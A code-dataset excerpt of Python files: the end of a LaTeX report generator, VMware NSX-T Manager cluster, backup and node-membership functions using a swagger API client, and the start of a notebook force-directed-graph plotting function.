_out_new_lines(step.what_learned)\n\t\t\t\t\t\t\t\tdesc.add_item(\"What I've learned of you want to do, in which preferred ways, and why:\", ps[0])\n\t\t\t\t\t\t\t\tfor p in ps[1:]:\n\t\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\t\t\t\t\t\t\tif step.this_is_designed_for:\n\t\t\t\t\t\t\t\tps = _out_new_lines(step.this_is_designed_for)\n\t\t\t\t\t\t\t\tdesc.add_item(\"This is the system that I have therefore designed for you:\", ps[0])\n\t\t\t\t\t\t\t\tfor p in ps[1:]:\n\t\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\t\t\t\t\n\t\t\t\t\tdoc.append(NewPage())\n\t\t \n\t\t\tif ev.comparison:\n\t\t\t\tc = ev.comparison\n\t\t\t\t\n\t\t\t\twith doc.create(Section('UNIFIED METACOMUNICATION MESSAGE')):\n\t\t\t\t\twith doc.create(Description()) as desc:\n\t\t\t\t\t\tif c.who_you_are:\n\t\t\t\t\t\t\tps = _out_new_lines(c.who_you_are)\n\t\t\t\t\t\t\tdesc.add_item(\"Who are you:\", ps[0])\n\t\t\t\t\t\t\tfor p in ps[1:]:\n\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\t\tif c.what_learned:\n\t\t\t\t\t\t\tps = _out_new_lines(c.what_learned)\n\t\t\t\t\t\t\tdesc.add_item(\"What I've learned of you want to do, in which preferred ways, and why:\", ps[0])\n\t\t\t\t\t\t\tfor p in ps[1:]:\n\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\t\tif c.this_is_designed_for:\n\t\t\t\t\t\t\tps = _out_new_lines(c.this_is_designed_for)\n\t\t\t\t\t\t\tdesc.add_item(\"This is the system that I have therefore designed for you:\", ps[0])\n\t\t\t\t\t\t\tfor p in ps[1:]:\n\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\t\t\t\t\t\t\t\n\t\t\t\twith doc.create(Section('SYSTEM COMMUNICABILLITY')):\n\t\t\t\t\tif ev.remarks:\n\t\t\t\t\t\twith doc.create(SmallText(\"Remarks:\")):\n\t\t\t\t\t\t\twith doc.create(Itemize()) as itemize:\n\t\t\t\t\t\t\t\tfor r in ev.remarks:\n\t\t\t\t\t\t\t\t\tfor p in _out_new_lines(r.description):\n\t\t\t\t\t\t\t\t\t\titemize.add_item(p)\t\t\t\t\n\n\t\t\t\twith doc.create(Description()) as desc:\n\t\t\t\t\tif c.conclusion:\n\t\t\t\t\t\tfor p in _out_new_lines(c.conclusion):\n\t\t\t\t\t\t\tdesc.add_item(\"Conclusion:\", p)\n\t\t\tif output == 'pdf':\n\t\t\t\ttry:\n\t\t\t\t\tdoc.generate_pdf(file,clean_tex=True)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tdoc.generate_pdf(file,clean=False,compiler='lualatex')\n\t\t\telse:\n\t\t\t\tdoc.generate_tex(file)\n\n\t\t\tq = db_session.query(Report).filter(Report.evaluation_id==evaluation_id)\n\t\t\tversion = 0 or q.count()\n\n\t\t\tr = Report()\n\t\t\tr.file = file\n\t\t\tr.version = version + 1\n\t\t\tr.evaluation_id = evaluation_id\n\n\t\t\tdb_session.add(r)\n\t\t\tdb_session.commit()\n\n\treturn name\n\n","sub_path":"web/frontend/printr.py","file_name":"printr.py","file_ext":"py","file_size_in_byte":6622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"584334310","text":"#!/usr/bin/env python3\n'''\nIonut Pirva \nSeptember 2021\n'''\n\nimport sys, subprocess, time\nfrom pprint import pprint\n\nfrom python.functions.variables import f_check_env_variables\n\n# add nsxOpenAPIBinding to the path where python will look for modules\nnsxOpenAPIBindingDir = f_check_env_variables(var = [\"nsxOpenAPIBindingDir\"])[\"nsxOpenAPIBindingDir\"]\nsys.path.insert(0, nsxOpenAPIBindingDir)\n\ndef f_check_nsx_nodes_status(nsxClusterIP: str = None, nsxClusterUser: str = None, nsxClusterPass: str = None, nsxClusterNodeUUID: list = None) -> dict:\n '''\n Return NSX Manager nodes status\n '''\n \n # keep Node UUID to IP map\n nsxNodeUUID2IP = dict()\n\n if nsxClusterNodeUUID == None:\n # initialize\n nsxClusterNodeUUID = list()\n # get out nodes UUID from cluster status\n nsxClusterStatus = f_check_nsx_cluster_status(nsxClusterIP = nsxClusterIP, nsxClusterUser = nsxClusterUser, nsxClusterPass = nsxClusterPass)\n try:\n nsxClusterStatusMembers = nsxClusterStatus[\"control_plane_nodes\"][\"members\"]\n for item in nsxClusterStatusMembers:\n ip, fqdn, uuid = item\n nsxClusterNodeUUID.append(uuid)\n if uuid not in nsxNodeUUID2IP.keys():\n nsxNodeUUID2IP[uuid] = dict() \n nsxNodeUUID2IP[uuid][\"IPv4\"] = ip\n nsxNodeUUID2IP[uuid][\"FQDN\"] = fqdn\n except Exception as e:\n print(f\"ERROR read NSX Manager Nodes UUID from {str(nsxClusterStatus)}: {str(e)}\")\n return None\n\n if type(nsxClusterNodeUUID) is not list:\n print(f\"ERROR provide a list with NSX Manager Cluster Node UUID to check. E.g: {str(['db1bb097-8ffd-49cc-9280-0dc46f854cd7', '137f0642-612b-b4d6-a86f-5a3fff706ede'])}\")\n return None\n else:\n # keep unique entries only\n nsxClusterNodeUUID = set(nsxClusterNodeUUID)\n if len(nsxClusterNodeUUID) == 0:\n print(f\"ERROR provide a list with NSX Manager Cluster Node UUID to check. E.g: {str(['db1bb097-8ffd-49cc-9280-0dc46f854cd7', '137f0642-612b-b4d6-a86f-5a3fff706ede'])}\")\n return None\n\n import swagger_client.configuration\n import swagger_client.rest\n import swagger_client.api_client\n from swagger_client.api.system_administration_configuration_nsx_managers_clusters_cluster_status_api import SystemAdministrationConfigurationNSXManagersClustersClusterStatusApi\n \n # Configure HTTP basic authorization: BasicAuth\n configuration = swagger_client.Configuration()\n configuration.host = f\"https://{nsxClusterIP}/api/v1\"\n configuration.username = nsxClusterUser\n configuration.password = nsxClusterPass\n configuration.verify_ssl = False\n\n nsxNodeStatus = dict()\n for nodeUUID in nsxClusterNodeUUID:\n print(f\"Check NSX Manager Node status: GET '/cluster/nodes/{str(nodeUUID)}/status'\\n\")\n # create an instance of the API class\n APIInstance = swagger_client.SystemAdministrationConfigurationNSXManagersClustersClusterStatusApi(swagger_client.ApiClient(configuration))\n try:\n # GET '/cluster/nodes/{node-id}/status'\n nsxNodeStatus[nodeUUID] = APIInstance.read_cluster_node_status_with_http_info(node_id=nodeUUID)\n nsxNodeStatusHTTPCode = nsxNodeStatus[nodeUUID][1]\n nsxNodeStatusOutput = nsxNodeStatus[nodeUUID][0]\n except Exception as e:\n print(f\"ERROR while trying to GET NSX node {str(nodeUUID)} status: {str(e)}\")\n return None\n if nsxNodeStatusHTTPCode == 200:\n print(f\"SUCCESS NSX API GET cluster node {str(nodeUUID)} status returned HTTP code: {str(nsxNodeStatusHTTPCode)}\")\n else:\n print(f\"ERROR NSX API GET cluster node {str(nodeUUID)} status returned HTTP code: {str(nsxNodeStatusHTTPCode)}\")\n return None\n\n # keep node UUID, system_status (cpu_*, disk_*, mem_*, system_time, uptime), version\n output = {}\n try:\n for k, v in nsxNodeStatus.items():\n if k not in output.keys():\n output[k] = dict()\n output[k][\"node_uuid\"] = k\n output[k][\"ipv4\"] = nsxNodeUUID2IP[k][\"IPv4\"]\n output[k][\"fqdn\"] = nsxNodeUUID2IP[k][\"FQDN\"]\n output[k][\"version\"] = v[0].version\n output[k][\"system_status\"] = dict()\n output[k][\"system_status\"][\"cpu_cores\"] = v[0].system_status.cpu_cores\n output[k][\"system_status\"][\"disk_space_total\"] = v[0].system_status.disk_space_total\n output[k][\"system_status\"][\"disk_space_used\"] = v[0].system_status.disk_space_used\n output[k][\"system_status\"][\"mem_cache\"] = v[0].system_status.mem_cache\n output[k][\"system_status\"][\"mem_total\"] = v[0].system_status.mem_total\n output[k][\"system_status\"][\"mem_used\"] = v[0].system_status.mem_used\n output[k][\"system_status\"][\"uptime\"] = v[0].system_status.uptime\n except Exception as e:\n print(f\"ERROR while trying to GET NSX nodes {str(nsxClusterNodeUUID)} status: {str(e)}\")\n return None\n\n return output\n\ndef f_check_nsx_cluster_status(nsxClusterIP: str = None, nsxClusterUser: str = None, nsxClusterPass: str = None) -> dict:\n '''\n Return NSX Manager cluster status\n '''\n\n import swagger_client.configuration\n import swagger_client.rest\n import swagger_client.api_client\n from swagger_client.api.system_administration_configuration_nsx_managers_clusters_cluster_status_api import SystemAdministrationConfigurationNSXManagersClustersClusterStatusApi\n\n # Configure HTTP basic authorization: BasicAuth\n configuration = swagger_client.Configuration()\n configuration.host = f\"https://{nsxClusterIP}/api/v1\"\n configuration.username = nsxClusterUser\n configuration.password = nsxClusterPass\n configuration.verify_ssl = False\n\n print(\"Check NSX Manager cluster status: GET '/cluster/status'\\n\")\n # create an instance of the API class\n APIInstance = swagger_client.SystemAdministrationConfigurationNSXManagersClustersClusterStatusApi(swagger_client.ApiClient(configuration))\n\n try:\n # GET '/cluster/status'\n nsxClusterStatus = APIInstance.read_cluster_status_with_http_info()\n nsxClusterStatusHTTPCode = nsxClusterStatus[1]\n nsxClusterStatusOutput = nsxClusterStatus[0]\n except Exception as e:\n print(f\"ERROR while trying to GET NSX cluster status: {str(e)}\")\n return None\n if nsxClusterStatusHTTPCode == 200:\n print(f\"SUCCESS NSX API GET cluster status returned HTTP code: {str(nsxClusterStatusHTTPCode)}\")\n else:\n print(f\"ERROR NSX API GET cluster status returned HTTP code: {str(nsxClusterStatusHTTPCode)}\")\n return None\n\n output = {}\n\n try:\n # nsx cluster id\n nsxClusterID = nsxClusterStatusOutput.cluster_id\n # nsx cluster control plane status\n nsxClusterControlStatus = nsxClusterStatusOutput.control_cluster_status.status\n # nsx cluster overall status\n nsxClusterOverallStatus = nsxClusterStatusOutput.detailed_cluster_status.overall_status\n # nsx cluster management status: offline and online nodes\n nsxClusterMgmtStatus = nsxClusterStatusOutput.mgmt_cluster_status.status\n if nsxClusterStatusOutput.mgmt_cluster_status.offline_nodes is None:\n # no mgmt plane offline for any nodes\n nsxClusterMgmtOfflineNodes = None\n else:\n nsxClusterMgmtOfflineNodes = list()\n for node in nsxClusterStatusOutput.mgmt_cluster_status.offline_nodes:\n nsxClusterMgmtOfflineNodes.append(node)\n if nsxClusterStatusOutput.mgmt_cluster_status.online_nodes is None:\n # no mgmt plane offline for any nodes\n nsxClusterMgmtOnlineNodes = None\n else:\n nsxClusterMgmtOnlineNodes = list()\n for node in nsxClusterStatusOutput.mgmt_cluster_status.online_nodes:\n nsxClusterMgmtOnlineNodes.append(node)\n # nsxClusterControlGroups is a list with all the control plane services, its memebers and status per member\n nsxClusterControlGroups = nsxClusterStatusOutput.detailed_cluster_status.groups\n if type(nsxClusterControlGroups) == list:\n if len(nsxClusterControlGroups) > 0:\n nsxClusterControlNodes = {}\n # which node uuid handles the cluster vip\n nsxClusterControlNodes[\"vip_node_uuid\"] = None\n nsxClusterControlNodes[\"groups\"] = {}\n nsxClusterControlNodes[\"members\"] = set()\n # nsxClusterControlNodes[\"members\"] = {}\n for el in nsxClusterControlGroups:\n nsxClusterControlNodesMembers = el.members\n # el.group_status\n # el.group_type\n # el.group_id\n if el.group_type == \"HTTPS\" or el.group_type == \"HTTP\":\n nsxClusterControlNodes[\"vip_node_uuid\"] = el.leaders[0].leader_uuid\n if el.group_id not in nsxClusterControlNodes[\"groups\"].keys():\n nsxClusterControlNodes[\"groups\"][el.group_id] = {}\n nsxClusterControlNodes[\"groups\"][el.group_id][\"group_status\"] = el.group_status\n nsxClusterControlNodes[\"groups\"][el.group_id][\"group_type\"] = el.group_type\n nsxClusterControlNodes[\"groups\"][el.group_id][\"members\"] = list()\n for m in nsxClusterControlNodesMembers:\n nsxClusterControlNodes[\"groups\"][el.group_id][\"members\"].append({\n \"member_fqdn\": m.member_fqdn,\n \"member_ip\": m.member_ip,\n \"member_status\": m.member_status,\n \"member_uuid\": m.member_uuid\n })\n if el.group_type != \"CONTROLLER\":\n nsxClusterControlNodes[\"members\"].add(\n (m.member_ip, m.member_fqdn, m.member_uuid)\n )\n else: \n nsxClusterControlNodes = None\n else:\n nsxClusterControlNodes = None\n except Exception as e:\n print(f\"ERROR NSX API GET cluster status processing failed: {str(e)}\")\n return None\n else:\n output[\"cluster_id\"] = nsxClusterID\n output[\"overall_status\"] = nsxClusterOverallStatus\n output[\"control_plane_status\"] = nsxClusterControlStatus\n output[\"management_plane_status\"] = nsxClusterMgmtStatus\n output[\"management_offline\"] = nsxClusterMgmtOfflineNodes\n output[\"management_online\"] = nsxClusterMgmtOnlineNodes\n output[\"control_plane_nodes\"] = nsxClusterControlNodes\n\n return output\n\ndef f_check_nsx_backup_status(nsxClusterIP: str = None, nsxClusterUser: str = None, nsxClusterPass: str = None) -> dict:\n '''\n Return NSX backup status\n '''\n\n import swagger_client.configuration\n import swagger_client.rest\n import swagger_client.api_client\n from swagger_client.api.system_administration_lifecycle_management_backup_restore_management_backup_api import SystemAdministrationLifecycleManagementBackupRestoreManagementBackupApi\n\n # Configure HTTP basic authorization: BasicAuth\n configuration = swagger_client.Configuration()\n configuration.host = f\"https://{nsxClusterIP}/api/v1\"\n configuration.username = nsxClusterUser\n configuration.password = nsxClusterPass\n configuration.verify_ssl = False\n\n print(\"Check NSX Backup status: GET '/backups/config'\\n\")\n # create an instance of the API class\n APIInstance = swagger_client.SystemAdministrationLifecycleManagementBackupRestoreManagementBackupApi(swagger_client.ApiClient(configuration))\n try:\n # GET '/backups/config'\n nsxBackupStatus = APIInstance.get_backup_config_with_http_info()\n nsxBackupStatusHTTPCode = nsxBackupStatus[1]\n nsxBackupStatusOutput = nsxBackupStatus[0]\n except Exception as e:\n print(f\"ERROR while trying to GET NSX backup status: {str(e)}\")\n return None\n else:\n print(nsxBackupStatusOutput)\n \n if nsxBackupStatusHTTPCode == 200:\n print(f\"SUCCESS NSX API GET backup status returned HTTP code: {str(nsxBackupStatusHTTPCode)}\")\n else:\n print(f\"ERROR NSX API GET backup status returned HTTP code: {str(nsxBackupStatusHTTPCode)}\")\n return None\n\n nsxBackupEnabled = None\n\n try:\n # nsx backup enabled True or False\n nsxBackupEnabled = nsxBackupStatusOutput.backup_enabled\n except Exception as e:\n print(f\"ERROR NSX API GET backup status processing failed: {str(e)}\")\n return None\n else:\n print(f\"SUCCESS NSX API GET backup status returned: {str(nsxBackupEnabled)}\")\n if nsxBackupEnabled is True:\n print(f\"SUCCESS NSX Cluster backup is enabled\")\n if nsxBackupStatus is False:\n print(f\"SUCCESS NSX Cluster backup is NOT enabled\")\n\n return nsxBackupEnabled\n\ndef f_do_nsx_backup(nsxClusterIP: str = None, nsxClusterUser: str = None, nsxClusterPass: str = None) -> dict:\n '''\n Perform NSX backup\n cluster-node-backups\n inventory-summary\n '''\n\n import swagger_client.configuration\n import swagger_client.rest\n import swagger_client.api_client\n from swagger_client.api.system_administration_lifecycle_management_backup_restore_management_backup_api import SystemAdministrationLifecycleManagementBackupRestoreManagementBackupApi\n\n\n print(f\"Checking NSX Cluster backup status ...\")\n nsxBackupStatus = f_check_nsx_backup_status(nsxClusterIP = nsxClusterIP, nsxClusterUser = nsxClusterUser, nsxClusterPass = nsxClusterPass)\n if nsxBackupStatus is not True:\n print(f\"ERROR to perform NSX backup: NSX Backup must be enabled.\")\n return None\n \n # Configure HTTP basic authorization: BasicAuth\n configuration = swagger_client.Configuration()\n configuration.host = f\"https://{nsxClusterIP}/api/v1\"\n configuration.username = nsxClusterUser\n configuration.password = nsxClusterPass\n configuration.verify_ssl = False\n \n # async_req=False\n print(f\"Synchronous NSX backup ongoing ...\\n\")\n\n # create an instance of the API class\n APIInstance = swagger_client.SystemAdministrationLifecycleManagementBackupRestoreManagementBackupApi(swagger_client.ApiClient(configuration))\n try:\n # POST '/cluster?action=backup_to_remote'\n # do sync backup\n nsxDoBackup = APIInstance.request_onetime_backup_backup_to_remote_with_http_info(async_req=False)\n except Exception as e:\n print(f\"ERROR while trying to GET NSX backup status: {str(e)}\")\n return None\n\n return True\n\n\ndef f_add_vm_nsx_cluster(nsxNewVMIP: str = None, nsxClusterIP: str = None, nsxClusterUser: str = None, nsxClusterPass: str = None) -> dict:\n '''\n ADD NSX Manager VM to cluster\n '''\n\n import swagger_client.configuration\n import swagger_client.rest\n import swagger_client.api_client\n from swagger_client.api.system_administration_configuration_nsx_managers_clusters_cluster_configuration_api import SystemAdministrationConfigurationNSXManagersClustersClusterConfigurationApi\n\n\n print(f\"Checking NSX Cluster status ...\")\n try:\n nsxClusterStatus = f_check_nsx_cluster_status(nsxClusterIP=nsxClusterIP, nsxClusterUser=nsxClusterUser, nsxClusterPass=nsxClusterPass)\n nsxClusterID = nsxClusterStatus[\"cluster_id\"]\n nsxClusterStatusOverall = nsxClusterStatus[\"overall_status\"]\n nsxClusterStatusCtrlGlobal = nsxClusterStatus[\"control_plane_status\"]\n nsxClusterStatusMgmtGlobal = nsxClusterStatus[\"management_plane_status\"]\n nsxClusterMembers = nsxClusterStatus[\"control_plane_nodes\"][\"members\"]\n except Exception as e:\n print(f\"ERROR while trying to GET NSX Cluster ID: {str(e)}\")\n return None\n for item in nsxClusterMembers:\n if nsxNewVMIP in item:\n print(f\"ERROR NSX Manager VM is already part of the NSX cluster ID {nsxClusterID}\")\n pprint(nsxClusterStatus)\n return None\n\n # move forward only if the cluster status is STABLE\n if nsxClusterStatusOverall != \"STABLE\":\n print(f\"ERROR NSX Manager cluster ID {nsxClusterID} overall status must be STABLE, and not {nsxClusterStatusOverall}\")\n return None\n else:\n print(f\"SUCCESS NSX Manager cluster ID {nsxClusterID} overall status is {nsxClusterStatusOverall}\")\n\n # get certficate_sha256_thumbprint\n print(f\"Get NSX Cluster {nsxClusterIP}:443 SSL SHA256 thumbprint ...\")\n nsxClusterIPSHA256Thumbprint = None\n try:\n cmdGetSHA256Thumbprint = (\n f\"openssl s_client -connect {nsxClusterIP}:443 < /dev/null 2>/dev/null | openssl x509 -fingerprint -sha256 -noout -in /dev/stdin \"\n \" | awk -F= '{gsub (\\\"[:]\\\",\\\"\\\"); printf $2}'\"\n )\n cmdRunGetSHA256Thumbprint = subprocess.Popen(cmdGetSHA256Thumbprint, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n cmdRunGetSHA256ThumbprintStdOut, cmdRunGetSHA256ThumbprintStdErr = cmdRunGetSHA256Thumbprint.communicate()\n except Exception as e:\n print(f\"ERROR cannot get SSL SHA256 thumbprint for {nsxClusterIP}:443: {str(e)}\")\n return None\n else:\n if len(cmdRunGetSHA256ThumbprintStdErr.decode()) != 0:\n print(f\"ERROR while reading the SSL SHA256 thumbprint for {nsxClusterIP}:443: {str(cmdRunGetSHA256ThumbprintStdErr.decode())}\")\n return None\n else:\n print(f\"SUCCESS the SSL SHA256 thumbprint for {nsxClusterIP}:443 is: {str(cmdRunGetSHA256ThumbprintStdOut.decode())}\")\n nsxClusterIPSHA256Thumbprint = cmdRunGetSHA256ThumbprintStdOut.decode()\n\n # Configure HTTP basic authorization: BasicAuth\n configuration = swagger_client.Configuration()\n configuration.host = f\"https://{nsxNewVMIP}/api/v1\"\n configuration.username = nsxClusterUser\n configuration.password = nsxClusterPass\n configuration.verify_ssl = False\n\n # create an instance of the API class\n APIInstance = swagger_client.SystemAdministrationConfigurationNSXManagersClustersClusterConfigurationApi(swagger_client.ApiClient(configuration))\n\n reqBody = {\n \"cluster_id\": nsxClusterID, \n \"ip_address\": nsxClusterIP, \n \"username\": nsxClusterUser, \n \"password\": nsxClusterPass, \n \"certficate_sha256_thumbprint\": nsxClusterIPSHA256Thumbprint\n }\n \n # add new NSX Manager VM to cluster\n # synchronous action\n print(f\"Adding NSX Manager VM {nsxNewVMIP} to NSX Manager {nsxClusterIP} cluster ID {nsxClusterID} ...\")\n print(f\"POST '/cluster?action=join_cluster'\")\n print(f\"{str(reqBody)}\")\n try:\n # POST '/cluster?action=join_cluster'\n nsxVMJoinCluster = APIInstance.join_cluster_join_cluster_with_http_info(reqBody, async_req=False)\n nsxVMJoinClusterHTTPCode = nsxVMJoinCluster[1]\n nsxVMJoinClusterOutput = nsxVMJoinCluster[0]\n except Exception as e:\n print(f\"ERROR while trying to add NSX Manager VM {nsxNewVMIP} to NSX Manager {nsxClusterIP} cluster ID {nsxClusterID}: {str(e)}\")\n return None\n else:\n print(nsxVMJoinClusterOutput)\n \n if nsxVMJoinClusterHTTPCode == 200:\n print(f\"SUCCESS NSX API POST add NSX Manager VM {nsxNewVMIP} to NSX Manager {nsxClusterIP} cluster ID {nsxClusterID} returned HTTP code: {str(nsxVMJoinClusterHTTPCode)}\")\n newVMJoined = False\n for i in nsxVMJoinClusterOutput.nodes:\n if nsxNewVMIP in (i.entities[0].fqdn, i.entities[0].ip_address):\n if i.status == \"JOINED\":\n print(f\"SUCCESS NSX Manager VM {nsxNewVMIP} joined NSX Manager {nsxClusterIP} cluster ID {nsxClusterID}\")\n newVMJoined = True\n if newVMJoined is False:\n print(f\"ERROR NSX Manager VM {nsxNewVMIP} did NOT join NSX Manager {nsxClusterIP} cluster ID {nsxClusterID}\")\n else:\n print(f\"ERROR NSX API POST add NSX Manager VM {nsxNewVMIP} to NSX Manager {nsxClusterIP} cluster ID {nsxClusterID} returned HTTP code: {str(nsxVMJoinClusterHTTPCode)}\")\n return None\n \n # terminate loop after 15 minutes\n whileLoopTerminate = 15*60 # seconds\n whileLoopSleep = 10 # seconds\n whileLoopCounter = 0\n while True:\n print(f\"INFO Waiting for the NSX cluster overall status to transition to STABLE {whileLoopTerminate - whileLoopCounter} / {whileLoopTerminate} seconds ...\")\n print(f\"{str(whileLoopCounter)} seconds passed ...\")\n\n try:\n nsxClusterStatus = f_check_nsx_cluster_status(nsxClusterIP=nsxClusterIP, nsxClusterUser=nsxClusterUser, nsxClusterPass=nsxClusterPass)\n nsxClusterID = nsxClusterStatus[\"cluster_id\"]\n nsxClusterStatusCtrlGlobal = nsxClusterStatus[\"control_plane_status\"]\n nsxClusterStatusMgmtGlobal = nsxClusterStatus[\"management_plane_status\"]\n except Exception as e:\n print(f\"ERROR while trying to GET NSX Cluster ID: {str(e)}\")\n break\n\n # move forward only if the cluster status is STABLE\n if nsxClusterStatusOverall == \"STABLE\":\n print(f\"SUCCESS NSX Manager cluster ID {nsxClusterID} overall status is {nsxClusterStatusOverall}\")\n break\n else:\n print(f\"INFO NSX Manager cluster ID {nsxClusterID} overall status is {nsxClusterStatusOverall}\")\n # sleep\n time.sleep(whileLoopSleep)\n \n if whileLoopCounter >= whileLoopTerminate:\n print(f\"ERROR Wait time of {str(whileLoopTerminate)} seconds expired.\")\n break\n whileLoopCounter += whileLoopSleep\n\n return f_check_nsx_cluster_status(nsxClusterIP=nsxClusterIP, nsxClusterUser=nsxClusterUser, nsxClusterPass=nsxClusterPass)\n\ndef f_remove_vm_nsx_cluster(nsxVMIP: list = None, nsxNewVM: list = None, nsxKeepVM: list = None, nsxClusterIP: str = None, nsxClusterUser: str = None, nsxClusterPass: str = None) -> dict:\n '''\n Remove NSX Manager VM from cluster\n nsxVMIP, nsxNewVM = [(IP, HOSTNAME), ]\n\n nsxVMIP = specific IP -> remove that specific NSX VM\n - this is done without checking that NSX Cluster overall status be STABLE\n nsxVMIP = None -> remove the old NSX Manager VMs and keep the newly deployed ones\n - this is done only if the NSX Cluster overall status is STABLE\n '''\n\n import swagger_client.configuration\n import swagger_client.rest\n import swagger_client.api_client\n from swagger_client.api.system_administration_configuration_nsx_managers_clusters_cluster_configuration_api import SystemAdministrationConfigurationNSXManagersClustersClusterConfigurationApi\n\n print(f\"Checking NSX Cluster status ...\")\n try:\n nsxClusterStatus = f_check_nsx_cluster_status(nsxClusterIP=nsxClusterIP, nsxClusterUser=nsxClusterUser, nsxClusterPass=nsxClusterPass)\n nsxClusterID = nsxClusterStatus[\"cluster_id\"]\n nsxClusterStatusOverall = nsxClusterStatus[\"overall_status\"]\n nsxClusterStatusCtrlGlobal = nsxClusterStatus[\"control_plane_status\"]\n nsxClusterStatusMgmtGlobal = nsxClusterStatus[\"management_plane_status\"]\n nsxClusterMembers = nsxClusterStatus[\"control_plane_nodes\"][\"members\"]\n nsxClusterMembersMgmtOnline = nsxClusterStatus[\"management_online\"]\n except Exception as e:\n print(f\"ERROR while trying to GET NSX Cluster ID: {str(e)}\")\n return None\n\n nsxVMUUID2IP = dict()\n\n # remove the new NSX VMs\n # keep the VMs from nsxKeepVM\n if nsxVMIP is not None:\n nsxVMUUID2Remove = list()\n nsxNewVMIPList = set()\n try:\n for item in nsxVMIP:\n a, b = item\n # keep the IP\n nsxNewVMIPList.add(a)\n\n for item in nsxClusterMembers:\n nsxVMIPv4Val, nsxVMHostnameVal, nsxVMUUIDVal = item\n if nsxVMIPv4Val in nsxNewVMIPList:\n nsxVMUUID2Remove.append(nsxVMUUIDVal)\n nsxVMUUID2IP[nsxVMUUIDVal] = nsxVMIPv4Val\n\n except Exception as e:\n pprint(f\"ERROR cannot determine node UUID for VM IP {str(nsxVMIP)} reading {nsxClusterMembers}: {str(e)}\")\n return None\n \n # remove the old NSX VMs\n if nsxVMIP is None:\n nsxVMUUID2Remove = list()\n nsxNewVMIPList = set()\n \n nsxKeepVMIPList = set()\n nsxExistingVMIP = set()\n\n # move forward only if the cluster status is STABLE\n if nsxClusterStatusOverall != \"STABLE\":\n print(f\"ERROR NSX Manager cluster ID {nsxClusterID} overall status must be STABLE, and not {nsxClusterStatusOverall}\")\n return None\n else:\n print(f\"SUCCESS NSX Manager cluster ID {nsxClusterID} overall status is {nsxClusterStatusOverall}\")\n\n try:\n for item in nsxNewVM:\n a, b = item\n # keep the IP\n nsxNewVMIPList.add(a)\n\n if nsxKeepVM is not None:\n for item in nsxKeepVM:\n a, b = item\n # keep the IP\n nsxKeepVMIPList.add(a)\n\n for item in nsxClusterMembers:\n nsxVMIPv4Val, nsxVMHostnameVal, nsxVMUUIDVal = item\n # capture the existing NSX Manager VM IPv4\n if nsxVMIPv4Val not in nsxNewVMIPList:\n nsxExistingVMIP.add(nsxVMIPv4Val)\n if nsxVMIPv4Val not in nsxNewVMIPList and nsxVMIPv4Val not in nsxKeepVMIPList:\n nsxVMUUID2Remove.append(nsxVMUUIDVal)\n nsxVMUUID2IP[nsxVMUUIDVal] = nsxVMIPv4Val\n except Exception as e:\n pprint(f\"ERROR cannot determine node UUID for the old NSX Manager VMs while reading {nsxClusterMembers}: {str(e)}\")\n return None\n \n # check that the nsxKeepVMIPList is part of the nsxExistingVMIP\n # if len(nsxKeepVMIPList) == 0 issubset would return True\n if nsxKeepVMIPList.issubset(nsxExistingVMIP) is False and len(nsxKeepVMIPList) > 0:\n pprint(f\"ERROR check that the IPv4 of the NSX Manager VMs chosen to be kept are correct: {str(nsxKeepVMIPList)}. The values must be part of: {str(nsxExistingVMIP)}\")\n return None\n\n if len(nsxVMUUID2Remove) == 0:\n pprint(f\"INFO There are no NSX Manager VM chosen to be removed from the cluster. VMs chosen to be kept: {str(nsxKeepVM)} VMs deployed: {str(nsxClusterMembers)}\")\n return None\n\n\n # Configure HTTP basic authorization: BasicAuth\n configuration = swagger_client.Configuration()\n configuration.host = f\"https://{nsxClusterIP}/api/v1\"\n configuration.username = nsxClusterUser\n configuration.password = nsxClusterPass\n configuration.verify_ssl = False\n \n # create an instance of the API class\n APIInstance = swagger_client.SystemAdministrationConfigurationNSXManagersClustersClusterConfigurationApi(swagger_client.ApiClient(configuration))\n \n # remove NSX Manager VM from cluster\n # synchronous action !!!\n for nsxVMUUID in nsxVMUUID2Remove:\n print(f\"Removing synchronously (!) NSX Manager VM {nsxVMUUID2IP[nsxVMUUID]}, node uuid {nsxVMUUID} from NSX Manager {nsxClusterIP} cluster ID {nsxClusterID} ...\")\n print(f\"POST '/cluster/{nsxVMUUID}?action=remove_node'\")\n try:\n # POST '/cluster/{node-id}?action=remove_node'\n nsxVMRemoveCluster = APIInstance.detach_cluster_node_remove_node_with_http_info(node_id=nsxVMUUID, async_req=False)\n except Exception as e:\n print(f\"ERROR while trying to remove NSX Manager VM {nsxVMUUID2IP[nsxVMUUID]}, node uuid {nsxVMUUID} from NSX Manager {nsxClusterIP} cluster ID {nsxClusterID}: {str(e)}\")\n return None\n else:\n print(nsxVMRemoveCluster)\n print(f\"SUCCESS NSX API POST remove NSX Manager VM {nsxVMUUID2IP[nsxVMUUID]}, node uuid {nsxVMUUID} from NSX Manager {nsxClusterIP} cluster ID {nsxClusterID}\")\n\n return True\n\n\n","sub_path":"NSX-T/ua-change-tshirt-size/python/functions/nsx.py","file_name":"nsx.py","file_ext":"py","file_size_in_byte":28199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"596522860","text":"from IPython.display import display, Javascript, HTML\nfrom pathlib import Path\nimport IPython.core.display\nimport numpy as np\nimport string\nimport json\nimport uuid\n\ndef plot_force_directed_graph(data_set: list = None, state_name=None, image=None, colour=None, zoom=True, coordinates=None, **kwargs):\n \"\"\"[summary]\n Parameters\n ----------\n data_set : list, required\n [description], by default list = None\n state_name : list, optional\n [description], by default None\n image : list, optional\n [description], by default None\n colour : list, optional\n [description], by default None\n zoom : boolean, optional\n [description], by default True\n \n Returns\n -------\n [type]\n [description], network graph\n \n Functions\n --------- \n Binds CSS and Javascript files into one output\n Plotting a network graph\n \"\"\"\n # generate random identifier for SVG element, to avoid name clashes if used multiple times in a notebook\n uid = 